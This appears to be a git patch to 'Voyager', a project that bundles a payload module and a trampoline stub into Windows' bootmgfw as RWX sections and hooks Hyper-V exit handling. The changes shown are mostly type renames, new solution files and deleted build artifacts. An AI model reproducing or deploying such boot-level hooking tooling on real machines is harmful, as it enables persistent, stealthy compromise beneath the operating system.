From 5d44a71b7d33ead1a4e80dd0563f17ffd901a1c7 Mon Sep 17 00:00:00 2001 From: xerox Date: Wed, 30 Sep 2020 21:12:15 -0700 Subject: [PATCH] idk what i added --- Efi Bundler/Efi Bundler.sln | 31 ++++ Efi Bundler/bundler.cpp | 12 +- Efi Bundler/bundler.h | 6 +- Efi Bundler/main.cpp | 4 +- Efi Bundler/shellcode.cpp | 12 +- Efi Bundler/utils.h | 10 +- Usermode Example/Example.sln | 31 ++++ .../Release/PayLoad(Intel).Build.CppClean.log | 13 -- .../x64/Release/PayLoad.Build.CppClean.log | 12 -- .../PayLoad/x64/Release/PayLoad.dll.recipe | 7 - Voyager-1/PayLoad/x64/Release/PayLoad.log | 7 - .../Release/PayLoad.tlog/CL.command.1.tlog | Bin 1450 -> 0 bytes .../x64/Release/PayLoad.tlog/CL.read.1.tlog | Bin 4132 -> 0 bytes .../x64/Release/PayLoad.tlog/CL.write.1.tlog | Bin 448 -> 0 bytes .../PayLoad.tlog/PayLoad.lastbuildstate | 2 - .../PayLoad.tlog/PayLoad.write.1u.tlog | Bin 400 -> 0 bytes .../Release/PayLoad.tlog/link.command.1.tlog | Bin 2200 -> 0 bytes .../x64/Release/PayLoad.tlog/link.read.1.tlog | Bin 1992 -> 0 bytes .../Release/PayLoad.tlog/link.write.1.tlog | Bin 298 -> 0 bytes Voyager-1/PayLoad/x64/Release/vc142.pdb | Bin 77824 -> 0 bytes .../PayLoad/x64/Release/vmexit_handler.obj | Bin 2743 -> 0 bytes Voyager-2/PayLoad/vmexit_handler.cpp | 13 +- Voyager-2/Voyager-2 (2004-1709)/BootMgfw.c | 10 +- .../{Hvix64.c => Hvax64.c} | 69 ++++----- Voyager-2/Voyager-2 (2004-1709)/Hvax64.h | 35 +++++ Voyager-2/Voyager-2 (2004-1709)/Hvix64.h | 54 ------- Voyager-2/Voyager-2 (2004-1709)/PayLoad.c | 132 +++++++++--------- Voyager-2/Voyager-2 (2004-1709)/PayLoad.h | 6 +- Voyager-2/Voyager-2 (2004-1709)/UefiMain.c | 3 + .../Voyager-2 (2004-1709).vcxproj | 6 +- .../Voyager-2 (2004-1709).vcxproj.filters | 10 +- Voyager-2/Voyager-2 (2004-1709)/WinLoad.c | 17 +-- Voyager-2/Voyager-2 (2004-1709)/WinLoad.h | 2 +- 33 files changed, 244 insertions(+), 260 deletions(-) create mode 100644 Efi Bundler/Efi Bundler.sln create mode 100644 Usermode Example/Example.sln delete mode 100644 Voyager-1/PayLoad/x64/Release/PayLoad(Intel).Build.CppClean.log delete mode 100644 Voyager-1/PayLoad/x64/Release/PayLoad.Build.CppClean.log delete mode 100644 Voyager-1/PayLoad/x64/Release/PayLoad.dll.recipe delete mode 100644 Voyager-1/PayLoad/x64/Release/PayLoad.log delete mode 100644 Voyager-1/PayLoad/x64/Release/PayLoad.tlog/CL.command.1.tlog delete mode 100644 Voyager-1/PayLoad/x64/Release/PayLoad.tlog/CL.read.1.tlog delete mode 100644 Voyager-1/PayLoad/x64/Release/PayLoad.tlog/CL.write.1.tlog delete mode 100644 Voyager-1/PayLoad/x64/Release/PayLoad.tlog/PayLoad.lastbuildstate delete mode 100644 Voyager-1/PayLoad/x64/Release/PayLoad.tlog/PayLoad.write.1u.tlog delete mode 100644 Voyager-1/PayLoad/x64/Release/PayLoad.tlog/link.command.1.tlog delete mode 100644 Voyager-1/PayLoad/x64/Release/PayLoad.tlog/link.read.1.tlog delete mode 100644 Voyager-1/PayLoad/x64/Release/PayLoad.tlog/link.write.1.tlog delete mode 100644 Voyager-1/PayLoad/x64/Release/vc142.pdb delete mode 100644 Voyager-1/PayLoad/x64/Release/vmexit_handler.obj rename Voyager-2/Voyager-2 (2004-1709)/{Hvix64.c => Hvax64.c} (60%) create mode 100644 Voyager-2/Voyager-2 (2004-1709)/Hvax64.h delete mode 100644 Voyager-2/Voyager-2 (2004-1709)/Hvix64.h diff --git a/Efi Bundler/Efi Bundler.sln b/Efi Bundler/Efi Bundler.sln new file mode 100644 index 0000000..a0f17f7 --- /dev/null +++ b/Efi Bundler/Efi Bundler.sln @@ -0,0 +1,31 @@ + +Microsoft Visual Studio Solution File, Format Version 12.00 +# Visual Studio Version 16 +VisualStudioVersion = 16.0.30503.244 +MinimumVisualStudioVersion = 10.0.40219.1 +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Efi Bundler", "Efi Bundler.vcxproj", "{EE860038-E3DD-4329-8D44-DF8B9ECBE420}" +EndProject +Global + GlobalSection(SolutionConfigurationPlatforms) = preSolution + Debug|x64 = Debug|x64 + Debug|x86 = Debug|x86 + Release|x64 = Release|x64 + Release|x86 = Release|x86 + EndGlobalSection + GlobalSection(ProjectConfigurationPlatforms) = postSolution + {EE860038-E3DD-4329-8D44-DF8B9ECBE420}.Debug|x64.ActiveCfg = Debug|x64 + {EE860038-E3DD-4329-8D44-DF8B9ECBE420}.Debug|x64.Build.0 = Debug|x64 + {EE860038-E3DD-4329-8D44-DF8B9ECBE420}.Debug|x86.ActiveCfg = Debug|Win32 + {EE860038-E3DD-4329-8D44-DF8B9ECBE420}.Debug|x86.Build.0 = Debug|Win32 + {EE860038-E3DD-4329-8D44-DF8B9ECBE420}.Release|x64.ActiveCfg = Release|x64 + {EE860038-E3DD-4329-8D44-DF8B9ECBE420}.Release|x64.Build.0 = Release|x64 + {EE860038-E3DD-4329-8D44-DF8B9ECBE420}.Release|x86.ActiveCfg = Release|Win32 + {EE860038-E3DD-4329-8D44-DF8B9ECBE420}.Release|x86.Build.0 = Release|Win32 + EndGlobalSection + GlobalSection(SolutionProperties) = preSolution + HideSolutionNode = FALSE + EndGlobalSection + GlobalSection(ExtensibilityGlobals) = postSolution + SolutionGuid = {6F313696-ED35-4BFB-B825-E3E8861D12E3} + EndGlobalSection +EndGlobal diff --git a/Efi Bundler/bundler.cpp b/Efi Bundler/bundler.cpp index 71c482e..3d9dc6b 100644 --- a/Efi Bundler/bundler.cpp +++ b/Efi Bundler/bundler.cpp @@ -2,9 +2,9 @@ namespace bundler { - std::pair add_section(std::vector& image, const char* name, std::size_t size, std::u32_t protect) + std::pair add_section(std::vector& image, const char* name, std::size_t size, std::uint32_t protect) { - auto align = [](std::u32_t size, std::u32_t align, std::u32_t addr) -> std::u32_t + auto align = [](std::uint32_t size, std::uint32_t align, std::uint32_t addr) -> std::uint32_t { if (!(size % align)) return addr + size; @@ -12,7 +12,7 @@ namespace bundler }; auto section_header = reinterpret_cast( - ((u64)&NT_HEADER(image.data())->OptionalHeader) + + ((std::uint64_t)&NT_HEADER(image.data())->OptionalHeader) + NT_HEADER(image.data())->FileHeader.SizeOfOptionalHeader); auto new_section = §ion_header[NT_HEADER(image.data())->FileHeader.NumberOfSections]; @@ -51,12 +51,12 @@ namespace bundler } // module_base is .efi section base in this case... - std::u32_t map_module(std::u8_t* module_base, std::vector& map_from) + std::uint32_t map_module(std::uint8_t* module_base, std::vector& map_from) { // copy nt headers... memcpy(module_base, map_from.data(), NT_HEADER(map_from.data())->OptionalHeader.SizeOfHeaders); auto sections = reinterpret_cast( - (u8*)&NT_HEADER(map_from.data())->OptionalHeader + + (std::uint8_t*)&NT_HEADER(map_from.data())->OptionalHeader + NT_HEADER(map_from.data())->FileHeader.SizeOfOptionalHeader); // copy sections... @@ -69,7 +69,7 @@ namespace bundler return NT_HEADER(map_from.data())->OptionalHeader.AddressOfEntryPoint; } - void bundle(std::vector& bundle_into, std::vector& bundle_module) + void bundle(std::vector& bundle_into, std::vector& bundle_module) { auto [trp_section_disk, trp_section_virt] = add_section(bundle_into, ".trp", sizeof shellcode::stub, SECTION_RWX); auto [mod_section_disk, mod_section_virt] = add_section(bundle_into, ".efi", bundle_module.size(), SECTION_RWX); diff --git a/Efi Bundler/bundler.h b/Efi Bundler/bundler.h index 5f00b7b..986d710 100644 --- a/Efi Bundler/bundler.h +++ b/Efi Bundler/bundler.h @@ -9,7 +9,7 @@ namespace bundler { - std::pair add_section(std::vector& image, const char* name, std::size_t size, std::u32_t protect); - std::u32_t map_module(std::u8_t* module_base, std::vector& map_from); - void bundle(std::vector& bundle_into, std::vector& bundle_module); + std::pair add_section(std::vector& image, const char* name, std::size_t size, std::uint32_t protect); + std::uint32_t map_module(std::uint8_t* module_base, std::vector& map_from); + void bundle(std::vector& bundle_into, std::vector& bundle_module); } diff --git a/Efi Bundler/main.cpp b/Efi Bundler/main.cpp index 67b3936..172bff7 100644 --- a/Efi Bundler/main.cpp +++ b/Efi Bundler/main.cpp @@ -8,8 +8,8 @@ int __cdecl main(int argc, char** argv) return -1; } - std::vector efi_module; - std::vector bootmgfw; + std::vector efi_module; + std::vector bootmgfw; impl::open_binary_file(argv[1], bootmgfw); impl::open_binary_file(argv[2], efi_module); diff --git a/Efi Bundler/shellcode.cpp b/Efi Bundler/shellcode.cpp index 65eeafa..c1d6626 100644 --- a/Efi Bundler/shellcode.cpp +++ b/Efi Bundler/shellcode.cpp @@ -16,15 +16,15 @@ namespace shellcode auto reloc = reinterpret_cast(module_base + base_reloc_dir->VirtualAddress); for (auto current_size = 0u; current_size < base_reloc_dir->Size; ) { - std::u32_t reloc_count = (reloc->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION)) / sizeof(u16); - auto reloc_data = reinterpret_cast((u8*)reloc + sizeof(IMAGE_BASE_RELOCATION)); - auto reloc_base = reinterpret_cast(module_base) + reloc->VirtualAddress; + std::uint32_t reloc_count = (reloc->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION)) / sizeof(std::uint16_t); + auto reloc_data = reinterpret_cast((std::uint8_t*)reloc + sizeof(IMAGE_BASE_RELOCATION)); + auto reloc_base = reinterpret_cast(module_base) + reloc->VirtualAddress; for (auto i = 0u; i < reloc_count; ++i, ++reloc_data) { - std::u16_t data = *reloc_data; - std::u16_t type = data >> 12; - std::u16_t offset = data & 0xFFF; + std::uint16_t data = *reloc_data; + std::uint16_t type = data >> 12; + std::uint16_t offset = data & 0xFFF; switch (type) { diff --git a/Efi Bundler/utils.h b/Efi Bundler/utils.h index 86cc529..19f9f1c 100644 --- a/Efi Bundler/utils.h +++ b/Efi Bundler/utils.h @@ -15,12 +15,12 @@ #include #include -#define NT_HEADER(x) reinterpret_cast( u64_t(x) + reinterpret_cast(x)->e_lfanew ) +#define NT_HEADER(x) reinterpret_cast( std::uint64_t(x) + reinterpret_cast(x)->e_lfanew ) namespace impl { using uq_handle = std::unique_ptr; - __forceinline u32_t get_process_id(const std::wstring_view process_name) + __forceinline std::uint32_t get_process_id(const std::wstring_view process_name) { // open a system snapshot of all loaded processes uq_handle snap_shot{ CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0), &CloseHandle }; @@ -40,7 +40,7 @@ namespace impl return 0; } - __forceinline void open_binary_file(const std::string& file, std::vector& data) + __forceinline void open_binary_file(const std::string& file, std::vector& data) { std::ifstream fstr(file, std::ios::binary); fstr.unsetf(std::ios::skipws); @@ -49,8 +49,8 @@ namespace impl const auto file_size = fstr.tellg(); fstr.seekg(NULL, std::ios::beg); - data.reserve(static_cast(file_size)); - data.insert(data.begin(), std::istream_iterator(fstr), std::istream_iterator()); + data.reserve(static_cast(file_size)); + data.insert(data.begin(), std::istream_iterator(fstr), std::istream_iterator()); } __forceinline bool enable_privilege(const std::wstring_view privilege_name) diff --git a/Usermode Example/Example.sln b/Usermode Example/Example.sln new file mode 100644 index 0000000..70996b7 --- /dev/null +++ b/Usermode Example/Example.sln @@ -0,0 +1,31 @@ + +Microsoft Visual Studio Solution File, Format Version 12.00 +# Visual Studio Version 16 +VisualStudioVersion = 16.0.30503.244 +MinimumVisualStudioVersion = 10.0.40219.1 +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Example", "Example.vcxproj", "{09B41831-3164-48AD-8660-23457D82B73B}" +EndProject +Global + GlobalSection(SolutionConfigurationPlatforms) = preSolution + Debug|x64 = Debug|x64 + Debug|x86 = Debug|x86 + Release|x64 = Release|x64 + Release|x86 = Release|x86 + EndGlobalSection + GlobalSection(ProjectConfigurationPlatforms) = postSolution + {09B41831-3164-48AD-8660-23457D82B73B}.Debug|x64.ActiveCfg = Debug|x64 + {09B41831-3164-48AD-8660-23457D82B73B}.Debug|x64.Build.0 = Debug|x64 + {09B41831-3164-48AD-8660-23457D82B73B}.Debug|x86.ActiveCfg = Debug|Win32 + {09B41831-3164-48AD-8660-23457D82B73B}.Debug|x86.Build.0 = Debug|Win32 + {09B41831-3164-48AD-8660-23457D82B73B}.Release|x64.ActiveCfg = Release|x64 + {09B41831-3164-48AD-8660-23457D82B73B}.Release|x64.Build.0 = Release|x64 + {09B41831-3164-48AD-8660-23457D82B73B}.Release|x86.ActiveCfg = Release|Win32 + {09B41831-3164-48AD-8660-23457D82B73B}.Release|x86.Build.0 = Release|Win32 + EndGlobalSection + GlobalSection(SolutionProperties) = preSolution + HideSolutionNode = FALSE + EndGlobalSection + GlobalSection(ExtensibilityGlobals) = postSolution + SolutionGuid = {E132D109-7F0D-4125-B737-B5D83E6FBCA8} + EndGlobalSection +EndGlobal diff --git a/Voyager-1/PayLoad/x64/Release/PayLoad(Intel).Build.CppClean.log b/Voyager-1/PayLoad/x64/Release/PayLoad(Intel).Build.CppClean.log deleted file mode 100644 index f02782a..0000000 --- a/Voyager-1/PayLoad/x64/Release/PayLoad(Intel).Build.CppClean.log +++ /dev/null @@ -1,13 +0,0 @@ -c:\users\xerox\desktop\voyager\payload (intel)\x64\release\vc142.pdb -c:\users\xerox\desktop\voyager\payload (intel)\x64\release\vmexit_handler.obj -c:\users\xerox\desktop\voyager\x64\release\payload(intel).dll -c:\users\xerox\desktop\voyager\x64\release\payload(intel).lib -c:\users\xerox\desktop\voyager\x64\release\payload(intel).exp -c:\users\xerox\desktop\voyager\x64\release\payload(intel).pdb -c:\users\xerox\desktop\voyager\payload (intel)\x64\release\payload (intel).tlog\cl.command.1.tlog -c:\users\xerox\desktop\voyager\payload (intel)\x64\release\payload (intel).tlog\cl.read.1.tlog -c:\users\xerox\desktop\voyager\payload (intel)\x64\release\payload (intel).tlog\cl.write.1.tlog -c:\users\xerox\desktop\voyager\payload (intel)\x64\release\payload (intel).tlog\link.command.1.tlog -c:\users\xerox\desktop\voyager\payload (intel)\x64\release\payload (intel).tlog\link.read.1.tlog -c:\users\xerox\desktop\voyager\payload (intel)\x64\release\payload (intel).tlog\link.write.1.tlog -c:\users\xerox\desktop\voyager\payload (intel)\x64\release\payload (intel).tlog\payload (intel).write.1u.tlog diff --git a/Voyager-1/PayLoad/x64/Release/PayLoad.Build.CppClean.log b/Voyager-1/PayLoad/x64/Release/PayLoad.Build.CppClean.log deleted file mode 100644 index 7c0f721..0000000 --- a/Voyager-1/PayLoad/x64/Release/PayLoad.Build.CppClean.log +++ /dev/null @@ -1,12 +0,0 @@ -c:\users\xerox\desktop\voyager\voyager-1\payload\x64\release\vc142.pdb -c:\users\xerox\desktop\voyager\voyager-1\payload\x64\release\vmexit_handler.obj -c:\users\xerox\desktop\voyager\voyager-1\x64\release\payload.dll -c:\users\xerox\desktop\voyager\voyager-1\x64\release\payload.lib -c:\users\xerox\desktop\voyager\voyager-1\x64\release\payload.exp -c:\users\xerox\desktop\voyager\voyager-1\payload\x64\release\payload.tlog\cl.command.1.tlog -c:\users\xerox\desktop\voyager\voyager-1\payload\x64\release\payload.tlog\cl.read.1.tlog -c:\users\xerox\desktop\voyager\voyager-1\payload\x64\release\payload.tlog\cl.write.1.tlog -c:\users\xerox\desktop\voyager\voyager-1\payload\x64\release\payload.tlog\link.command.1.tlog -c:\users\xerox\desktop\voyager\voyager-1\payload\x64\release\payload.tlog\link.read.1.tlog -c:\users\xerox\desktop\voyager\voyager-1\payload\x64\release\payload.tlog\link.write.1.tlog -c:\users\xerox\desktop\voyager\voyager-1\payload\x64\release\payload.tlog\payload.write.1u.tlog diff --git a/Voyager-1/PayLoad/x64/Release/PayLoad.dll.recipe b/Voyager-1/PayLoad/x64/Release/PayLoad.dll.recipe deleted file mode 100644 index 65cc69c..0000000 --- a/Voyager-1/PayLoad/x64/Release/PayLoad.dll.recipe +++ /dev/null @@ -1,7 +0,0 @@ - - - C:\Users\xerox\Desktop\voyager\Voyager-1\x64\Release\PayLoad.dll - - - - \ No newline at end of file diff --git a/Voyager-1/PayLoad/x64/Release/PayLoad.log b/Voyager-1/PayLoad/x64/Release/PayLoad.log deleted file mode 100644 index c4594d2..0000000 --- a/Voyager-1/PayLoad/x64/Release/PayLoad.log +++ /dev/null @@ -1,7 +0,0 @@ - Building 'PayLoad' with toolset 'WindowsKernelModeDriver10.0' and the 'Universal' target platform. - vmexit_handler.cpp - Creating library C:\Users\xerox\Desktop\voyager\Voyager-1\x64\Release\PayLoad.lib and object C:\Users\xerox\Desktop\voyager\Voyager-1\x64\Release\PayLoad.exp - PayLoad.vcxproj -> C:\Users\xerox\Desktop\voyager\Voyager-1\x64\Release\PayLoad.dll - Driver is 'Universal'. - Inf2Cat task was skipped as there were no inf files to process - diff --git a/Voyager-1/PayLoad/x64/Release/PayLoad.tlog/CL.command.1.tlog b/Voyager-1/PayLoad/x64/Release/PayLoad.tlog/CL.command.1.tlog deleted file mode 100644 index 98fcd9443bb815825e3b439dff38b6a07891d338..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 1450 zcmd6nU2hUm5QgX4#Q)HEOF*DlEr}N^TefQ{5U@a-jYL_B8-bFQ2KC3Q&&-}(il)6b z2sdqF(gurL{XW} z<1N1FriFH|+v76svD6DcU0(l|7{9YTRu-*#&9EcO$5V*RL#?=1&pyA9J2Li=eUF$A zz35$4c~kK6muU?;h4#W;*8a!W6ul?!@jJlp{`RNvnztPP%5Dgx?c~bk_>$-~UpKOG zu?18)t6U&?C2p}cS*gsaTSEQjjx|HSL-&Omr$oJdpueTUDc-cwn*&Bd&6oIDJ8i(L zvOBdyV(X5Qlz8WB^Vi11i%0u0!lrL%!+abyqQ`4=QC%u@x-ah>E0CYY-ob9rQ&l-W zIM-banf;V3ojkDXIgc^KqfhLS>m{G;k9q$QldDswQ(ePQ~^;oVJ3cg8dZP zK@-hTVq+Lfwy9-4K5QpS& z?wtoI@%OKvmf5`x)>&gu_Qrd#t&=L+!IsF4y;^IP)%1JXojusf>74h!*$kbU`JEML zKCoUoCE8odvGQ&&jIJ3koP`wpn&*pM9GGm-(|lzc$7ba$J+i7`W>4GFR_F}OS8!H; z4WmXM)vfms=XLbY6Yy0lr3#`nrHP|Do z<>?D+gyp#@N4KmPoYvgtNEtRev{M(`;)A#65p7^2TTkH6!4#)GUdsQEtCy}a#;X%* zLH>xnXDEIiTT%C;Dcn=$7qmCD>MJ|Sy>L_&8z(C|%3aEw@)H(Qc~iA{U*)Yw4ZjCe z0rermVLW{$o2mlshrva)MOJi=UVe6L$A});@4QoFKO1vgLye1R=BnBIx^gufCc@{~ zI*~%fc8sOdM7yjbqpDrW+QZW^_;;k=|3*He>ZXas|Cs2c_0=~GkEPpPJ=xG#Q+r!= zI1P4#r#;`&X*rDddr$R+-tA*V{h_q>gLAG97Uy%s79Yb_)fh3yJNSo@7^8yy YU+wYhbGo~Rys78Zk#2;_=9U5Jk^g@KY=(#f7`rijP(kT9p)n{{K(3-ptZPmr5Y>$j#i7Oyi4+9f=1$ z2RiMEXqi_`)XIAr?s$Ugr{aL)XqxYO#af!6^MO`Mr~6rRl{#|Pls6}JZ|b);p^$&j nTC(^7Nn}eYqE6n~-`T4(VI}gC4TV^0_J8M@`!O%RixGYRPD4Wo diff --git a/Voyager-1/PayLoad/x64/Release/PayLoad.tlog/PayLoad.lastbuildstate b/Voyager-1/PayLoad/x64/Release/PayLoad.tlog/PayLoad.lastbuildstate deleted file mode 100644 index 197bfa6..0000000 --- a/Voyager-1/PayLoad/x64/Release/PayLoad.tlog/PayLoad.lastbuildstate +++ /dev/null @@ -1,2 +0,0 @@ -PlatformToolSet=WindowsKernelModeDriver10.0:VCToolArchitecture=Native32Bit:VCToolsVersion=14.27.29110:TargetPlatformVersion=10.0.19041.0: -Release|x64|C:\Users\xerox\Desktop\voyager\Voyager-1\| diff --git a/Voyager-1/PayLoad/x64/Release/PayLoad.tlog/PayLoad.write.1u.tlog b/Voyager-1/PayLoad/x64/Release/PayLoad.tlog/PayLoad.write.1u.tlog deleted file mode 100644 index 35e2fe5426d72e9bd685c4bbf56e02ac63bd9e6a..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 400 zcmezWFOI>P!HOYu zSWOH=7z$sP!4Rk>04QI{-~*INWJtl_>jBM32AW*}v@M?@i-DJciw16}U@&7a0ook| dbY~6_CxZQl?lwK3TqZ-(0J|X-92%f-001mtOmYAK diff --git a/Voyager-1/PayLoad/x64/Release/PayLoad.tlog/link.command.1.tlog b/Voyager-1/PayLoad/x64/Release/PayLoad.tlog/link.command.1.tlog deleted file mode 100644 index 6ac0c0efee8d0aaec5e22d0bdb600b121e27e244..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 2200 zcmc(gYflqV5QgWoiT{D{84Hz4FNP0oX>sXgo8CzpNfDw(E`}n}Kd(OToZa3G2~n%r z?4CJu=JL+v%>MZP)~Z&ri4Cl0HS6-7*x0FKdK)x%=L zy{a1&*(C80c8W6tzsQni^6^CGGUf|?^4qkL^bcK0jT;3GTo~dbzhdQ{N&La4cEh~6a*F}iY7FwCNzzGj{C_9&q61ZFO&tB5gz3z4IOcmux7>S- z_x2jTY9Oh@IThkmr&ReDX&TB#sG;KRU^gavx@9%b>L<_74c{x@M_5!BDpw_+j72Lj zxpT}%P0>K@TYgRz6Y79_6;AVWx%^zWFxMzBb0znZC+n2#ralS@rL(|WruOlnIBsp0 z^vaBS-%{z4qtg`E`DZGBZtpm`hQ1@Z8IMjbpwI1#y(g33IJ-ns(o^h($ diff --git a/Voyager-1/PayLoad/x64/Release/PayLoad.tlog/link.read.1.tlog b/Voyager-1/PayLoad/x64/Release/PayLoad.tlog/link.read.1.tlog deleted file mode 100644 index 30800205906f57523821a5008e617d025ee1e375..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 1992 zcmdUw+fKqj5QgX4#CPCQFCZ7JG6?3MjF{Nl*1i*#&nc4-&e8!p&&;O6kntYZms;w@NTq2&pb zYfxtFj{F08tfs3Y-;wmlstz9Db&W7`R^L(cq@fjm2}c~2X@2>RT$)z@BVI};f7*9oFAVZ{J!iL)_bxVY)%J;t b<`3zUB9O^_)LE!4< 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 